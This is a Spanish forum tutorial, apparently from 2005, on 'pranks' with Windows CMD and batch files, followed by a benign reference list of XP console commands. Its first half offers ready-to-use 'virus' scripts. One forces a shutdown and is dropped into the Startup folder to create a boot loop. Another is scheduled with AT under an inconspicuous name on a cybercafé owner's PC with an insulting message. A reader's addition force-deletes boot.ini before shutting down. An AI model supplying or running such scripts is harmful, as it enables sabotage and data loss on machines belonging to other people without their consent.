epelpad

Gastar bromas con CMD y +

Breve introducción:

Que es eso raro del BATCH? Para que me puede servir? Esto sirve para hackear?

Batch es un lenguaje de programación MUY FÁCIL que se usa en la consola del S.O. windows. Es un lenguaje que no necesita software, ni compiladores.. y en poco tiempo te permite hacer verdaderas curiosidades.

Vamos a empezar con una practica muy sencilla.

Ve a INICIO, luego a EJECUTAR y escribe CMD si tienes XP o COMMAND si tienes win9x.
Se abre una pantalla negra con letras blancas. A esto se le llama msdos, console, consola, linea de comandos o shell. Desde ahi puedes escribir comandos que darían ordenes especificas a tu makina. Las instrucciones que escribas aquí tendrán prioridad absoluta en todo momento. Por ello la efectividad de este lenguaje. Sencillez, rapidez y efectividad se unen para formar este lenguaje de programación.
Ok ahora escribe lo siguiente (solo para xp):

shutdown -s -t 120 -c "Probando una cosa" Escribelo tal cual y presiona enter

Este es el metodo que usa el famoso virus lsasser que se ha propagado por todo el mundo.
Para detenerlo escribe shutdown -a y todo volvería a la normalidad.
Acabamos de descubrir la forma de crear un virus (algo mediocre )en 10 segundos!

Que necesito para comenzar?

Windows. Recomendable XP.. pero win9x también sirve. La linea de comandos y el bloc de notas de windows. Con un poco de paciencia veras como salen cosas interesantes!.

Seguimos con nuestro ejemplo practico. Abre el bloc de notas. Escribe allí lo siguiente:

shutdown -s -f -t 15 -c "Virus creado por mi!!"

Ahora le damos a GUARDAR COMO. Seleccionamos TODOS LOS ARCHIVOS. y lo guardamos con el siguiente nombre: MIVIRUS.BAT
Es imprescindible que tenga extension BAT.
Ok, acabas de crear tu primer virus. TAN FACIL?? No te lo puedes ni creer verdad?
prueba a pinchar dos veces sobre el a ver que ocurre...

El equipo se apagara en 15 segundos!! Esta vez solo podrías poner shutdown -a a tiempo si eres extremadamente rápido!

Si copias este archivo mivirus.bat en la carpeta programasinicio del windows abras creado un verdadero problema...
Esta carpeta tiene la capacidad de iniciar en el arranque cualquier programa que esta dentro de ella. Si colocamos nuestro recirn creado virus.. haremos que el ordenador no permanezca encendido mas de 15 segundos!!

Usaremos la linea de comandos como centro de practicas, y el bloc de notas como compilador.
Como ves es uno de los lenguajes de programación mas sencillos que existen.

Para avanzar mas rápido no voy a comentar los comandos mas usuales como DIR, DEL, RD, MD, CD, EXIT, etc... podéis buscar cualquier manual para msdos de xp. hay miles en google.

Empezaremos con cosas sencillas... y acabaremos haciendo algunas cosas interesantes.. .

Es todo por hoy!
Un saludo! k4ron73

----------------------------------------------------------------------------------------------------------------------

Seguimos un poco con el comando shutdown:


Accedemos a la consola.
Si escribimos HELP tendremos una lista de los comandos basicos del sistema, con una breve explicación de que hace cada uno.
Si queremos información mas especifica solo tenemos que escribir el nombre del comando /?.
por ejemplo, escribe:

shutdown /?

Te saldría explicado que utilidad tiene este comando y todos sus modificadores. un modificador o parámetro es -f, -t, -a, /vv, /L, etc.. se colocan después del comando y sirven para darle instrucciones mas precisas.

Vamos a comentar por encima los parámetros de shutdown que mas vamos a usar de ahora en adelante:

-s Da la orden de apagar el equipo (shutdown -s = apaga el equipo al instante)
-r En vez de apagar lo que hace es reiniciar el equipo. (shutdown -r)
-a Con esta orden evitamos que el sistema se apaga o reinicie.
-f Fuerza a cerrar todas las aplicaciones que requieran autorización o confirmación!!
-c "" Entre las comillas puedes poner un comentario que saldría en la pantalla de aviso.
-t 00 puedes poner el tiempo en segundos que quieres que dure el Pc encendido.

Veamos con un ejemplo practico:
Estoy instalando una actualización de windows que tarda 20 minutos en instalarse.. y después tendría que reiniciar el equipo para que haga efecto. Pero no me apetece estar 20 minutos sentado delante de la pantalla..Tecleamos lo siguiente:

shutdown -r -f -t 1800

esto haría que en 30 minutos (30min x 60sg=1800sg) el pc se reinicie (-r) sin pedir confirmación y forzando a cerrar todas las aplicaciones (-f)

Otro supuesto:
Estoy en un ciber.. y me cae muy mal el dueño. además sospecho que la vez anterior me cobre de mas... asi que voy a gastarle una broma simpática que no revertira daños en el pc..

pondremos lo siguiente:

at 17:15 shutdown -s -f -t 15 -c "De camino que vas a decirle al due?o que se te ha apagado el ordenador, dile que es un "soy un "soy un "soy un "soy un "soy un "soy un capullo"""""" de mi parte"

JAJAJAJAJAJA!! Habria que ver la cara que se le queda al que esta usando el pc al ver este mensaje!!

Hemos programado una tarea con el comando AT para que se ejecute a las 17:15h.
Este es otro comando que usaremos mucho.. y que ofrece grandes posibilidades. Puedes, por ejemplo programar que cargue el CounterStrike a la hora que tu quieras... o que se desactive el antivirus.. (jejeje paciencia.. todo a su debido tiempo)
Pero ya veremos a fondo este comando el siguiente dia!

saludos!


k4ron73 2005



Tengo que hacer una corrección a este pequeño manual:

El programador de tareas en la linea de comandos (AT) no funciona tal y como viene lineas mas arriba.
Aunque en la misma ayuda del comando viene explicito la posibilidad de REPLACEar comandos, esto no es cierto en la practica.
Tendremos que crear un archivo bat con el código y guardarlo en un carpeta, y POSTERIORMENTE programarlo para que se ejecute.

En el ejemplo de arriba, haríamos un .bat con el siguiente código:


shutdown -s -f -t 15 -c "De camino que vas a decirle al dueño que se te ha apagado el ordenador, dile que es un "soy un "soy un "soy un "soy un "soy un "soy un capullo"""""" de mi parte"

Le ponemos un nombre que no llame mucho la atención y lo guardamos en una carpeta. Por ejemplo lo llamaremos SHUT.BAT y lo guardaremos en C:WINDOWS. ok?

Luego para programarlo escribiremos directamente en la linea de comandos:

AT 17:15 C:WINDOWSSHUT.BAT De esta manera se ejecutara sin problemas.
Soy nuevo, pero se me ocurrio algo, para agregarle al shutdown... para hacer un poco mas molesto el este
Cuasi-Virus.
Que pasaria si agregaramos del /f /a:h /a:s c:boot.ini
y despues shutdown -s -t 5
Quedaria una cosa asi:

@echo off
Title Virus, o casi...
del /f /a:h /a:s c:boot.ini
shutdown -s -t 5
Echo Y bueno son cosas que pasan =S
Pause > nul

Otra recopilación de nuestro amigo JeSuLeS ReC:

En Windows XP hay muchísimos comandos utiles, pero lo malo de todo esto es su gran desconocimiento. Para poder utilizarlos, debemos abrir la consola de

comandos, o la ventanita de MS-dos. En Windows XP, por ejemplo, podemos acceder a ella clickando en:

Inicio > Ejecutar > cmd o bien pulsando la tecla Windows + R

Con todos estos comandos, también podemos solicitar una ayuda, añadiendo uno de los siguiente parámetros: /? - /h a nuestra llamada.


Comandos de Archivos y sistemas de ficheros

cacls - Permite modificar los permisos de lectura y escritura en ficheros y carpetas
chkdsk - Comprueba el estado de una partición y repara los da?os en caso de que encuentre alguno. Sin parámetros simplemente escanea e informa de errores. Para que además repare, añadimos el parámetro /F: chkdsk /F

cipher - Cifrado de datos en particiones NTFS
comp - Compara archivos o carpetas y muestra las diferencias existentes entre ellos
compact - Compresor de archivos. El parámetro para la compresión es /C, el parámetro para descomprimir es /U
convert - Conversor de particiones, convierte particiones FAT16 o FAT32 en particiones NTFS sin perdida de datos
defrag - Defragmentador de archivos
diskpart - Permite crear, eliminar y administrar particiones. Este programa en modo consola debemos utilizarlo con cuidado puesto que es fácil que eliminemos sin darnos cuenta todo el contenido del disco duro o de la partición activa
find y findstr - Comandos de búsqueda de ficheros. findstr permite buscar cadenas de caracteres dentro de los archivos
iexpress - Asistente para crear comprimidos .CAB
openfiles - Muestra a un administrador los archivos abiertos en un sistema y permite desconectarlos si se han abierto atreves de red


Comandos de Configuración e información del sistema


bootcfg - Configurador de arranque. Simplemente modifica el archivo boot.ini para indicar opciones de arranque

control userpasswords2 - Permite modificar las claves y los permisos de los diferentes usuarios, asi como requerir la pulsación de control+alt+suprimir para poder iniciar sesión, haciendo el inicio de sesión mas seguro

driverquery - Crea un informe sobre los dirvers instalados en el sistema. Muestra además información detallada de cada uno
dxdiag - Herramienta de diagnostico de DirectX
gpresult - Información de las políticas de grupo aplicadas a un usuario
gpupdate - Actualizar las políticas de grupo
pagefileconfig - Configuración de la memoria virtual de Windows
prncnfg - Información sobre las impresoras instaladas
prnjobs - Información sobre los trabajos de impresion en cola
reg - Permite ver y modificar valores del registro de Windows. Opciones posibles:

reg query: consulta en el registro
reg add: añadir entrada
reg delete: eliminar entrada
reg copy: copiar clave en otro lugar del registro
reg save: guardar parte del registro
reg restore: restaura el registro
reg load: cargar valor o clave desde un archivo .reg
reg unload: descargar valor o clave
reg compare: comparar valores de registro
reg export: exportar registro a un archivo
reg import: importar registro a un archivo

sc - Administrador de servicios, podemos detenerlos, ejecutarlos, etc
sfc - Este comando permite buscar archivos del sistema dañados y recuperarlos en caso de que esten defectuosos (es necesario el CD de instalación del sistema operativo para utilizarlo). Para realizar una comprobación inmediata, deberemos ejecutar la orden sfc /scannow
systeminfo - Muestra información sobre nuestro equipo y nuestro sistema operativo: numero de procesadores, tipo de sistema, actualizaciones instaladas, etc
taskkill - Permite matar procesos conociendo su nombre o su numero de proceso (PID)
Tasklist - Informe sobre los procesos ejecutados en el sistema


Comandos de Redes


arp - Muestra y permite modificar las tablas del protocolo ARP, encargado de convertir las direcciones IP de cada ordenador en direcciones MAC (direccion física unica de cada tarjeta de red)
ftp - Cliente FTP en modo consola de comandos
getmac - Muestra las direcciones MAC de los adaptadores de red que tengamos instalados en el sistema
ipconfig - Muestra y permite renovar la configuracion de todos los interfaces de red
nbtstat - Muestra las estadisticas y las conexiones actuales del protocolo NetBIOS sobre TCP/IP, los recursos compartidos y los recursos que son accesibles
net - Permite administrar usuarios, carpetas compartidas, servicios, etc. Para un listado completo de todas las opciones, escribir net sin ningún argumento. Para obtener ayuda sobre alguna opción en concreto, escribiere net help opción

netsh - Programa en modo consola permite ver, modificar y diagnosticar la configuraci?n de la red
netstat - Informacion sobre las conexiones de red de nuestro equipo
nslookup - Aplicacion de red orientada a obtener informaci?n en los servidores DNS sobre un host en concreto
pathping - Muestra la ruta que sigue cada paquete para llegar a una IP determinada, el tiempo de respuesta de cada uno de los nodos por los que pasa y las

Estadisticas de cada uno de ellos

ping - Comando para comprobar si una máquina esta en red o no
rasdial - Permite establecer o finalizar una conexion telefónica
route - Permite ver o modificar las tablas de enrutamiento de red
tracert - Informa sobre el camino que siguen los paquetes IP desde que sale de nuestra máquina hasta que llega a su destino


Comandos Miscelanea


at - Permite programar tareas para que nuestro ordenador las ejecute en una fecha o en un momento determinado
logoff - Comando para cerrar sesiones, incluso en equpos remotos
msg - Envia mensajes por la red a otros equipos
msiexec - Comando para ejecutar archivos de instalacion .MSI
runas - Ejecucion de programas como si fueras otro usuario
shctasks - Administrador de tareas programadas
shutdown - Comando para apagar, reiniciar el equipo. Es especialmente util si hemos sido infectado con el virus Blaster o una de sus variantes para cancelar la

cuenta atras. Para ello, tan solo tendremos que utilizar la sintaxis shutdown -a

Comandos de Microsoft Management Console (MMC)

Los siguientes comandos no son mas que los accesos a cada seccion de la MMC, que lanzaran una interfaz grafica.


ciadv.msc - Permite configurar el servicio de indexado, que acelera las busquedas en el disco duro
compmgmt.msc - Da acceso a la Administracion de equipos, desde donde podemos configurar nuestro ordenador y acceder a otras partes de la MMC
devmgmt.msc - Administrador de dispositivos
dfrg.msc - Defragmentador de disco
diskmgmt.msc - Administrador de discos
fsmgmt.msc - Monitorización y Administración de los recursos compartidos
gpedit.msc - Políticas de grupo
lusrmgr.msc - Administración de usuarios
ntmsmgr.msc - Administración de dispositivos de almacenamiento extraibles
ntmsoprq.msc - Monitorización de las solicitudes de operador de medios extraibles
perfmon.msc - Monitor de sistema
secpol.msc - Configuración de seguridad local
services.msc - Administrador de servicios


fuente: k4ron73

2 comentarios - Gastar bromas con CMD y +

DracxCore
había algunos comandos que no sabia gracias